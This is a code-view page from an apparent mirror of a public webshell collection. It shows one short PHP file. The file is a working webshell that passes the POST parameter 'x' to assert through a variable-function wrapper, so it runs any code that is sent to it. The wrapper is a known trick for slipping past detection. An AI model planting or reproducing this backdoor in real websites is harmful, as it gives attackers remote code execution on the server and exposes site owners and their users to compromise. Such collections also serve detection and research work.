mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
8 lines
87 B
PHP
8 lines
87 B
PHP
<?php
|
|
function sqlsec($a){
|
|
$a($_POST['x']);
|
|
}
|
|
|
|
sqlsec(assert);
|
|
?>
|